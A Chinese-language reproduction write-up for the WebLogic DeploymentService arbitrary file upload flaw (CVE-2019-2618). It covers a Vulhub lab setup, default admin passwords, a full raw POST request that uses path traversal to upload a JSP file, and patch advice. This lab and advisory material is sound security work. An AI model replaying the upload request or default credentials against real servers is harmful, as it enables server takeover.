1.漏洞介绍
CVE-2019-2618漏洞主要是利用了WebLogic组件中的DeploymentService接口,该接口支持向服务器上传任意文件。攻击者突破了OAM(Oracle Access Management)认证,设置wl_request_type参数为app_upload,构造文件上传格式的POST请求包,上传jsp木马文件,进而可以获得整个服务器的权限。
2.影响版本
WebLogic 10.3.6.0、12.1.3.0、12.2.1.3
3.漏洞复现
3.1漏洞环境
使用Vulhub里面的CVE-2017-10271环境作为漏洞环境
root@kali:~/vulhub/weblogic/CVE-2017-10271# ls
1.png docker-compose.yml README.md set_mirror.sh
root@kali:~/vulhub/weblogic/CVE-2017-10271# docker-compose up -d
访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动
3.2漏洞利用
需要获取weblogic的登陆权限
可尝试以下默认口令
weblogic/weblogic
weblogic/Oracle@123
POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1Host: 192.168.64.161:7001Connection: closeAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.21.0username: weblogicwl_request_type: app_uploadcache-control: no-cachewl_upload_application_name: /../tmp/_WL_internal/bea_wls_internal/9j4dqk/warserverName: testpassword: Oracle@123content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gWarchive: trueserver_version: 10.3.6.0wl_upload_delta: trueContent-Length: 1081------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="img"; filename="test.jsp"Content-Type: false out.print("123456");%>------WebKitFormBoundary7MA4YWxkTrZu0gW--
4.修复建议
1、加强密码口令
2、Oracle官方已经在关键补丁更新(CPU)中修复了该漏洞
链接:
https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
5.工具利用
大佬脚本
https://github.com/jas502n/cve-2019-2618